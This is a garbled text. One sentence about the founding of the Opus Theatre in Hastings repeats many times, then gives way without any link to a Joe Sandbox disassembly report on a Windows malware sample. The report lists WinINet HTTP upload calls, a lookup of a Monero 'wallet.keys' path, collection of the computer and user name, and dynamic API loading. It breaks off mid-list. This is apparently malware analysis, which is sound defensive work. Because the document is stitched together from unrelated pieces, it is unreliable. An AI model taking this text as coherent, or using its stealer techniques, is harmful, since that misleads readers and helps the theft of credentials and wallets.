Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                  • API String ID: 1542196881-2218711628
                  • Opcode ID: 11bad7e7109603dcc4ff2a08ad4b4894f5b717807090f019004e83eb3c068bc4
                  • Instruction ID: def7a39281dc99318b26bfa586b20d157c6b34c58e0b8748c85d27c9a6d0d800
                  • Opcode Fuzzy Hash: 11bad7e7109603dcc4ff2a08ad4b4894f5b717807090f019004e83eb3c068bc4
                  • Instruction Fuzzy Hash: 8E41F471FCB60C6EC624B7A4B87EEDD775B6F52F01B685282E80052780CEB1B5016D2B
                  Function 00FB4880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 801 fb4880-fb4942 call fca7a0 call fb47b0 call fca740 * 5 InternetOpenA StrCmpCA 816 fb494b-fb494f 801->816 817 fb4944 801->817 818 fb4ecb-fb4ef3 InternetCloseHandle call fcaad0 call fb9ac0 816->818 819 fb4955-fb4acd call fc8b60 call fca920 call fca8a0 call fca800 * 2 call fca9b0 call fca8a0 call fca800 call fca9b0 call fca8a0 call fca800 call fca920 call fca8a0 call fca800 call fca9b0 call fca8a0 call fca800 call fca9b0 call fca8a0 call fca800 call fca9b0 call fca920 call fca8a0 call fca800 * 2 InternetConnectA 816->819 817->816 829 fb4f32-fb4fa2 call fc8990 * 2 call fca7a0 call fca800 * 8 818->829 830 fb4ef5-fb4f2d call fca820 call fca9b0 call fca8a0 call fca800 818->830 819->818 905 fb4ad3-fb4ad7 819->905 830->829 906 fb4ad9-fb4ae3 905->906 907 fb4ae5 905->907 908 fb4aef-fb4b22 HttpOpenRequestA 906->908 907->908 909 fb4b28-fb4e28 call fca9b0 call fca8a0 call fca800 call fca920 call fca8a0 call fca800 call fca9b0 call fca8a0 call fca800 call fca9b0 call fca8a0 call fca800 call fca9b0 call fca8a0 call fca800 call fca9b0 call fca8a0 call fca800 call fca920 call fca8a0 call fca800 call fca9b0 call fca8a0 call fca800 call fca9b0 call fca8a0 call fca800 call fca920 call fca8a0 call fca800 call fca9b0 call fca8a0 call fca800 call fca9b0 call fca8a0 call fca800 call fca9b0 call fca8a0 call fca800 call fca9b0 call fca8a0 call fca800 call fca920 call fca8a0 call fca800 call fca740 call fca920 * 2 call fca8a0 call fca800 * 2 call fcaad0 lstrlen call fcaad0 * 2 lstrlen call fcaad0 HttpSendRequestA 908->909 910 fb4ebe-fb4ec5 InternetCloseHandle 908->910 1021 fb4e32-fb4e5c InternetReadFile 909->1021 910->818 1022 fb4e5e-fb4e65 1021->1022 1023 fb4e67-fb4eb9 InternetCloseHandle call fca800 1021->1023 1022->1023 1024 fb4e69-fb4ea7 call fca9b0 call fca8a0 call fca800 1022->1024 1023->910 1024->1021
                  APIs
                    • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                    • Part of subcall function 00FB47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00FB4839
                    • Part of subcall function 00FB47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00FB4849
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00FB4915
                  • StrCmpCA.SHLWAPI(?,00C8EAA8), ref: 00FB493A
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FB4ABA
                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00FD0DDB,00000000,?,?,00000000,?,",00000000,?,00C8EA48), ref: 00FB4DE8
                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00FB4E04
                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00FB4E18
                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00FB4E49
                  • InternetCloseHandle.WININET(00000000), ref: 00FB4EAD
                  • InternetCloseHandle.WININET(00000000), ref: 00FB4EC5
                  • HttpOpenRequestA.WININET(00000000,00C8E988,?,00C8E368,00000000,00000000,00400100,00000000), ref: 00FB4B15
                    • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00C89158,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                    • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                    • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                    • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                    • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                    • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                  • InternetCloseHandle.WININET(00000000), ref: 00FB4ECF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                  • String ID: "$"$------$------$------
                  • API String ID: 460715078-2180234286
                  • Opcode ID: f5e6772ec4fc7a2796d0bd9b1e5894cb93b83282cf1f1caf070ed9e52df898e0
                  • Instruction ID: dfb2a0ccbbdf62885b74c7e1170082abc22beb138812785f59f82f3f22803364
                  • Opcode Fuzzy Hash: f5e6772ec4fc7a2796d0bd9b1e5894cb93b83282cf1f1caf070ed9e52df898e0
                  • Instruction Fuzzy Hash: A812E47291011DAADB18EB90DE93FEEB339AF14304F5041ADB10662491EF787E49DB62
                  Function 00FC78E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FC7910
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FC7917
                  • GetComputerNameA.KERNEL32(?,00000104), ref: 00FC792F
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateComputerNameProcess
                  • String ID:
                  • API String ID: 1664310425-0
                  • Opcode ID: 204910939c12d502d0df0fc1bbbfc31b350e1a08adb8f1b32ca04bafa2213fbf
                  • Instruction ID: 13446c0e512c48c067a3abf7bb95c2dbcd8046fc60212a4a61287b2e28cfc113
                  • Opcode Fuzzy Hash: 204910939c12d502d0df0fc1bbbfc31b350e1a08adb8f1b32ca04bafa2213fbf
                  • Instruction Fuzzy Hash: 930162B1904205EFC714DF95D946FAEBBB8FB44B21F10422EE555A3680C77959408BA1
                  Function 00FC7850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00FB11B7), ref: 00FC7880
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FC7887
                  • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00FC789F
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateNameProcessUser
                  • String ID:
                  • API String ID: 1296208442-0
                  • Opcode ID: a50fbea8f942e7dd736a9b85938afde8b33249938cc435cbc9517f30b3ca4f9d
                  • Instruction ID: 7e7c080114c452236dc700b67ad7df230b750478a740a67b3e8661db04a19792
                  • Opcode Fuzzy Hash: a50fbea8f942e7dd736a9b85938afde8b33249938cc435cbc9517f30b3ca4f9d
                  • Instruction Fuzzy Hash: D4F0A4B1904209AFC714DF84D946FAEBBB8FB04711F10022DF615A3680C77815448BA1
                  Function 00FB1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitInfoProcessSystem
                  • String ID:
                  • API String ID: 752954902-0
                  • Opcode ID: 0011fb4f2055730ef30bc980c491acba2c743a7ad7d8eb2e3ce60421f6d509d4
                  • Instruction ID: 0e1ca9d6ee6f7413b388f95b2c99b4b16f1ff373fcd018a324f0db53abb1d830
                  • Opcode Fuzzy Hash: 0011fb4f2055730ef30bc980c491acba2c743a7ad7d8eb2e3ce60421f6d509d4
                  • Instruction Fuzzy Hash: 83D017749002089BCB149AA0A849ADDBB78FB08211F000668D90A62240EA3164828BA5
                  Function 00FC9C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 633 fc9c10-fc9c1a 634 fca036-fca0ca LoadLibraryA * 8 633->634 635 fc9c20-fca031 GetProcAddress * 43 633->635 636 fca0cc-fca141 GetProcAddress * 5 634->636 637 fca146-fca14d 634->637 635->634 636->637 638 fca216-fca21d 637->638 639 fca153-fca211 GetProcAddress * 8 637->639 640 fca21f-fca293 GetProcAddress * 5 638->640 641 fca298-fca29f 638->641 639->638 640->641 642 fca2a5-fca332 GetProcAddress * 6 641->642 643 fca337-fca33e 641->643 642->643 644 fca41f-fca426 643->644 645 fca344-fca41a GetProcAddress * 9 643->645 646 fca428-fca49d GetProcAddress * 5 644->646 647 fca4a2-fca4a9 644->647 645->644 646->647 648 fca4dc-fca4e3 647->648 649 fca4ab-fca4d7 GetProcAddress * 2 647->649 650 fca515-fca51c 648->650 651 fca4e5-fca510 GetProcAddress * 2 648->651 649->648 652 fca612-fca619 650->652 653 fca522-fca60d GetProcAddress * 10 650->653 651->650 654 fca67d-fca684 652->654 655 fca61b-fca678 GetProcAddress * 4 652->655 653->652 656 fca69e-fca6a5 654->656 657 fca686-fca699 GetProcAddress 654->657 655->654 658 fca708-fca709 656->658 659 fca6a7-fca703 GetProcAddress * 4 656->659 657->656 659->658
                  APIs
                  • GetProcAddress.KERNEL32(74DD0000,00C75C30), ref: 00FC9C2D
                  • GetProcAddress.KERNEL32(74DD0000,00C75B50), ref: 00FC9C45
                  • GetProcAddress.KERNEL32(74DD0000,00C89430), ref: 00FC9C5E
                  • GetProcAddress.KERNEL32(74DD0000,00C89340), ref: 00FC9C76
                  • GetProcAddress.KERNEL32(74DD0000,00C89448), ref: 00FC9C8E
                  • GetProcAddress.KERNEL32(74DD0000,00C89460), ref: 00FC9CA7
                  • GetProcAddress.KERNEL32(74DD0000,00C7B9A0), ref: 00FC9CBF
                  • GetProcAddress.KERNEL32(74DD0000,00C8D4B8), ref: 00FC9CD7
                  • GetProcAddress.KERNEL32(74DD0000,00C8D428), ref: 00FC9CF0
                  • GetProcAddress.KERNEL32(74DD0000,00C8D578), ref: 00FC9D08
                  • GetProcAddress.KERNEL32(74DD0000,00C8D518), ref: 00FC9D20
                  • GetProcAddress.KERNEL32(74DD0000,00C75D30), ref: 00FC9D39
                  • GetProcAddress.KERNEL32(74DD0000,00C75B70), ref: 00FC9D51
                  • GetProcAddress.KERNEL32(74DD0000,00C75D10), ref: 00FC9D69
                  • GetProcAddress.KERNEL32(74DD0000,00C75B90), ref: 00FC9D82
                  • GetProcAddress.KERNEL32(74DD0000,00C8D410), ref: 00FC9D9A
                  • GetProcAddress.KERNEL32(74DD0000,00C8D458), ref: 00FC9DB2
                  • GetProcAddress.KERNEL32(74DD0000,00C7B5E0), ref: 00FC9DCB
                  • GetProcAddress.KERNEL32(74DD0000,00C75CB0), ref: 00FC9DE3
                  • GetProcAddress.KERNEL32(74DD0000,00C8D5A8), ref: 00FC9DFB
                  • GetProcAddress.KERNEL32(74DD0000,00C8D440), ref: 00FC9E14
                  • GetProcAddress.KERNEL32(74DD0000,00C8D590), ref: 00FC9E2C
                  • GetProcAddress.KERNEL32(74DD0000,00C8D4E8), ref: 00FC9E44
                  • GetProcAddress.KERNEL32(74DD0000,00C75E30), ref: 00FC9E5D
                  • GetProcAddress.KERNEL32(74DD0000,00C8D500), ref: 00FC9E75
                  • GetProcAddress.KERNEL32(74DD0000,00C8D470), ref: 00FC9E8D
                  • GetProcAddress.KERNEL32(74DD0000,00C8D3F8), ref: 00FC9EA6
                  • GetProcAddress.KERNEL32(74DD0000,00C8D488), ref: 00FC9EBE
                  • GetProcAddress.KERNEL32(74DD0000,00C8D4A0), ref: 00FC9ED6
                  • GetProcAddress.KERNEL32(74DD0000,00C8D560), ref: 00FC9EEF
                  • GetProcAddress.KERNEL32(74DD0000,00C8D4D0), ref: 00FC9F07
                  • GetProcAddress.KERNEL32(74DD0000,00C8D530), ref: 00FC9F1F
                  • GetProcAddress.KERNEL32(74DD0000,00C8D548), ref: 00FC9F38
                  • GetProcAddress.KERNEL32(74DD0000,00C8A570), ref: 00FC9F50
                  • GetProcAddress.KERNEL32(74DD0000,00C8CE40), ref: 00FC9F68
                  • GetProcAddress.KERNEL32(74DD0000,00C8D0B0), ref: 00FC9F81
                  • GetProcAddress.KERNEL32(74DD0000,00C75E50), ref: 00FC9F99
                  • GetProcAddress.KERNEL32(74DD0000,00C8CE88), ref: 00FC9FB1
                  • GetProcAddress.KERNEL32(74DD0000,00C75970), ref: 00FC9FCA
                  • GetProcAddress.KERNEL32(74DD0000,00C8CF48), ref: 00FC9FE2
                  • GetProcAddress.KERNEL32(74DD0000,00C8CFC0), ref: 00FC9FFA
                  • GetProcAddress.KERNEL32(74DD0000,00C757D0), ref: 00FCA013
                  • GetProcAddress.KERNEL32(74DD0000,00C758B0), ref: 00FCA02B
                  • LoadLibraryA.KERNEL32(00C8CF78,?,00FC5CA3,00FD0AEB,?,?,?,?,?,?,?,?,?,?,00FD0AEA,00FD0AE3), ref: 00FCA03D
                  • LoadLibraryA.KERNEL32(00C8CFD8,?,00FC5CA3,00FD0AEB,?,?,?,?,?,?,?,?,?,?,00FD0AEA,00FD0AE3), ref: 00FCA04E
                  • LoadLibraryA.KERNEL32(00C8CEE8,?,00FC5CA3,00FD0AEB,?,?,?,?,?,?,?,?,?,?,00FD0AEA,00FD0AE3), ref: 00FCA060
                  • LoadLibraryA.KERNEL32(00C8CDF8,?,00FC5CA3,00FD0AEB,?,?,?,?,?,?,?,?,?,?,00FD0AEA,00FD0AE3), ref: 00FCA072
                  • LoadLibraryA.KERNEL32(00C8CF60,?,00FC5CA3,00FD0AEB,?,?,?,?,?,?,?,?,?,?,00FD0AEA,00FD0AE3), ref: 00FCA083
                  • LoadLibraryA.KERNEL32(00C8CF18,?,00FC5CA3,00FD0AEB,?,?,?,?,?,?,?,?,?,?,00FD0AEA,00FD0AE3), ref: 00FCA095
                  • LoadLibraryA.KERNEL32(00C8CE28,?,00FC5CA3,00FD0AEB,?,?,?,?,?,?,?,?,?,?,00FD0AEA,00FD0AE3), ref: 00FCA0A7
                  • LoadLibraryA.KERNEL32(00C8CF90,?,00FC5CA3,00FD0AEB,?,?,?,?,?,?,?,?,?,?,00FD0AEA,00FD0AE3), ref: 00FCA0B8
                  • GetProcAddress.KERNEL32(75290000,00C75810), ref: 00FCA0DA
                  • GetProcAddress.KERNEL32(75290000,00C8CE10), ref: 00FCA0F2
                  • GetProcAddress.KERNEL32(75290000,00C89068), ref: 00FCA10A
                  • GetProcAddress.KERNEL32(75290000,00C8CE58), ref: 00FCA123
                  • GetProcAddress.KERNEL32(75290000,00C757F0), ref: 00FCA13B
                  • GetProcAddress.KERNEL32(6FDD0000,00C7B798), ref: 00FCA160
                  • GetProcAddress.KERNEL32(6FDD0000,00C75870), ref: 00FCA179
                  • GetProcAddress.KERNEL32(6FDD0000,00C7B608), ref: 00FCA191
                  • GetProcAddress.KERNEL32(6FDD0000,00C8D038), ref: 00FCA1A9
                  • GetProcAddress.KERNEL32(6FDD0000,00C8D0C8), ref: 00FCA1C2
                  • GetProcAddress.KERNEL32(6FDD0000,00C75910), ref: 00FCA1DA
                  • GetProcAddress.KERNEL32(6FDD0000,00C759B0), ref: 00FCA1F2
                  • GetProcAddress.KERNEL32(6FDD0000,00C8CF00), ref: 00FCA20B
                  • GetProcAddress.KERNEL32(752C0000,00C75A10), ref: 00FCA22C
                  • GetProcAddress.KERNEL32(752C0000,00C75990), ref: 00FCA244
                  • GetProcAddress.KERNEL32(752C0000,00C8CFA8), ref: 00FCA25D
                  • GetProcAddress.KERNEL32(752C0000,00C8D098), ref: 00FCA275
                  • GetProcAddress.KERNEL32(752C0000,00C75710), ref: 00FCA28D
                  • GetProcAddress.KERNEL32(74EC0000,00C7B680), ref: 00FCA2B3
                  • GetProcAddress.KERNEL32(74EC0000,00C7B6D0), ref: 00FCA2CB
                  • GetProcAddress.KERNEL32(74EC0000,00C8CEB8), ref: 00FCA2E3
                  • GetProcAddress.KERNEL32(74EC0000,00C756D0), ref: 00FCA2FC
                  • GetProcAddress.KERNEL32(74EC0000,00C759D0), ref: 00FCA314
                  • GetProcAddress.KERNEL32(74EC0000,00C7B7C0), ref: 00FCA32C
                  • GetProcAddress.KERNEL32(75BD0000,00C8D0E0), ref: 00FCA352
                  • GetProcAddress.KERNEL32(75BD0000,00C75930), ref: 00FCA36A
                  • GetProcAddress.KERNEL32(75BD0000,00C89098), ref: 00FCA382
                  • GetProcAddress.KERNEL32(75BD0000,00C8D020), ref: 00FCA39B
                  • GetProcAddress.KERNEL32(75BD0000,00C8CED0), ref: 00FCA3B3
                  • GetProcAddress.KERNEL32(75BD0000,00C75730), ref: 00FCA3CB
                  • GetProcAddress.KERNEL32(75BD0000,00C75950), ref: 00FCA3E4
                  • GetProcAddress.KERNEL32(75BD0000,00C8CE70), ref: 00FCA3FC
                  • GetProcAddress.KERNEL32(75BD0000,00C8CFF0), ref: 00FCA414
                  • GetProcAddress.KERNEL32(75A70000,00C758D0), ref: 00FCA436
                  • GetProcAddress.KERNEL32(75A70000,00C8CF30), ref: 00FCA44E
                  • GetProcAddress.KERNEL32(75A70000,00C8D008), ref: 00FCA466
                  • GetProcAddress.KERNEL32(75A70000,00C8D050), ref: 00FCA47F
                  • GetProcAddress.KERNEL32(75A70000,00C8CEA0), ref: 00FCA497
                  • GetProcAddress.KERNEL32(75450000,00C759F0), ref: 00FCA4B8
                  • GetProcAddress.KERNEL32(75450000,00C75A30), ref: 00FCA4D1
                  • GetProcAddress.KERNEL32(75DA0000,00C758F0), ref: 00FCA4F2
                  • GetProcAddress.KERNEL32(75DA0000,00C8D068), ref: 00FCA50A
                  • GetProcAddress.KERNEL32(6F070000,00C75A50), ref: 00FCA530
                  • GetProcAddress.KERNEL32(6F070000,00C75890), ref: 00FCA548
                  • GetProcAddress.KERNEL32(6F070000,00C75A70), ref: 00FCA560
                  • GetProcAddress.KERNEL32(6F070000,00C8D080), ref: 00FCA579
                  • GetProcAddress.KERNEL32(6F070000,00C75A90), ref: 00FCA591
                  • GetProcAddress.KERNEL32(6F070000,00C75830), ref: 00FCA5A9
                  • GetProcAddress.KERNEL32(6F070000,00C75750), ref: 00FCA5C2
                  • GetProcAddress.KERNEL32(6F070000,00C756B0), ref: 00FCA5DA
                  • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 00FCA5F1
                  • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 00FCA607
                  • GetProcAddress.KERNEL32(75AF0000,00C8D308), ref: 00FCA629
                  • GetProcAddress.KERNEL32(75AF0000,00C89078), ref: 00FCA641
                  • GetProcAddress.KERNEL32(75AF0000,00C8D170), ref: 00FCA659
                  • GetProcAddress.KERNEL32(75AF0000,00C8D188), ref: 00FCA672
                  • GetProcAddress.KERNEL32(75D90000,00C756F0), ref: 00FCA693
                  • GetProcAddress.KERNEL32(6E330000,00C8D3E0), ref: 00FCA6B4
                  • GetProcAddress.KERNEL32(6E330000,00C75770), ref: 00FCA6CD
                  • GetProcAddress.KERNEL32(6E330000,00C8D2F0), ref: 00FCA6E5
                  • GetProcAddress.KERNEL32(6E330000,00C8D0F8), ref: 00FCA6FD
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
